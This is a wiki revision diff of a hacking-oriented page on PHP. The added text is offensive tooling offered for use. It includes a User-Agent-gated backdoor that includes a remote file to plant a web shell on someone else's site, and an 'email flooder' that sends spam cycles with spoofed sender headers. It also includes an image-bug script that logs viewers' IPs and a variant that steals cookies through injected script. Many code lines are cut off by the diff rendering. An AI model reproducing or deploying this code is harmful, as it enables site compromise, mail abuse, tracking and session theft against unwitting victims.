tools:php
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
tools:php [2024/06/03 03:40] – [Do-while loops] Humphrey Boa-Gart | tools:php [2024/08/06 05:48] (current) – external edit 127.0.0.1 | ||
---|---|---|---|
Line 1: | Line 1: | ||
- | {{wst> | + | {{wst> |
====== PHP ====== | ====== PHP ====== | ||
Line 309: | Line 309: | ||
==== Simple Backdoor in PHP ==== | ==== Simple Backdoor in PHP ==== | ||
+ | Because many of you want to go straight to the uber hax, I'll add this little bit in. Please stop reading and Google up the following if you don't know this already: | ||
+ | |||
+ | 1. Basic Understanding of PHP 2. Remote File Inclusion 3. Basic web hacking 4. Web shell (c99, x2300 Locus7s, r57, etc.) 5. User Agents and how to change them | ||
+ | |||
+ | Now that you have an idea of what these are, here is how to backdoor a page. If you have access to someone' | ||
+ | |||
+ | <?php | ||
+ | $blackdoor = $_SERVER[' | ||
+ | if($blackdoor == "PUT YOUR USER AGENT HERE) | ||
+ | | ||
+ | @include(' | ||
+ | | ||
+ | ?> | ||
==== Email flooder in PHP ==== | ==== Email flooder in PHP ==== | ||
- | ===== Image bugs ===== | + | If you want to just copy this and run it off a server, go ahead. Unfortunately most free PHP hosts don't allow you to send mail, but I guess you can run it off your localhost. You must have access to the sendmail binary on your system to run; it's just a matter of configuring php.ini, which I won't go into now. |
+ | |||
+ | You need to have: | ||
+ | |||
+ | 1. a server 2. basic knowledge of PHP 3. knowledge on how to install/ | ||
+ | |||
+ | <?php | ||
+ | | ||
+ | // define number of spam cycles | ||
+ | |||
+ | | ||
+ | // this is the message | ||
+ | |||
+ | | ||
+ | // define recipient | ||
+ | |||
+ | $rofl = $_POST[" | ||
+ | // your message | ||
+ | |||
+ | | ||
+ | $sender = $_POST[" | ||
+ | $header = ' | ||
+ | | ||
+ | From: <' . $sender . '>'; | ||
+ | |||
+ | return($header); | ||
+ | } | ||
+ | // spoofed header. i found it easier to write it this way. | ||
+ | |||
+ | | ||
+ | for($i = 1; $i <= $spam; $i++){ | ||
+ | |||
+ | | ||
+ | |||
+ | mail($_POST[" | ||
+ | |||
+ | } // (the second for loop) defines one cycle | ||
+ | |||
+ | echo "Done $i loops of $spam | ||
+ | "; // | ||
+ | |||
+ | } | ||
+ | echo " | ||
+ | } | ||
+ | else { | ||
+ | /* if the form isn't filled out show it. also, mess around with this part any way you like. */ | ||
+ | ?> | ||
+ | <form method=" | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | < | ||
+ | |||
+ | </ | ||
+ | <?php | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | ===== Image Bugs ===== | ||
+ | |||
+ | Pretty fucking simple, really. You insert the following into an e-mail or something: | ||
+ | |||
+ | c | ||
+ | |||
+ | Then in iplulz.php on your server (or whatever you call it), put this code: | ||
+ | |||
+ | //PROTIP: Make a directory on your server called image.png or any image name, then save the code as index.php in the directory.// | ||
+ | |||
+ | <?PHP | ||
+ | $the_image = " | ||
+ | $ip_lister = fopen(" | ||
+ | fwrite($ip_lister, | ||
+ | fclose($ip_lister); | ||
+ | if (!strncasecmp(substr($the_image, | ||
+ | $image_mime = " | ||
+ | else $image_mime = substr($the_image, | ||
+ | header(" | ||
+ | echo file_get_contents($the_image); | ||
+ | ?> | ||
+ | |||
+ | User gets the image, you get their IP added to a list. EVERYONE WINS | ||
+ | |||
+ | Also, can steel cookies in dat way: | ||
+ | |||
+ | <?PHP | ||
+ | $the_image = " | ||
+ | $ip_lister | ||
+ | fwrite($ip_lister, | ||
+ | fclose($ip_lister); | ||
+ | if (!strncasecmp(substr($the_image, | ||
+ | $image_mime | ||
+ | else $image_mime | ||
+ | header(" | ||
+ | echo file_get_contents($the_image); | ||
+ | ?> | ||
+ | |||
+ | And in email or whatevastuff put | ||
+ | |||
+ | < | ||
+ | document.write("< | ||
+ | ') | ||
+ | </ | ||
- | {{tag> | + | {{tag> |
tools/php.1717386021.txt.gz · Last modified: 2024/08/06 05:52 (external edit)
Find this page online at: https://bestpoint.institute/tools/php
Find this page online at: https://bestpoint.institute/tools/php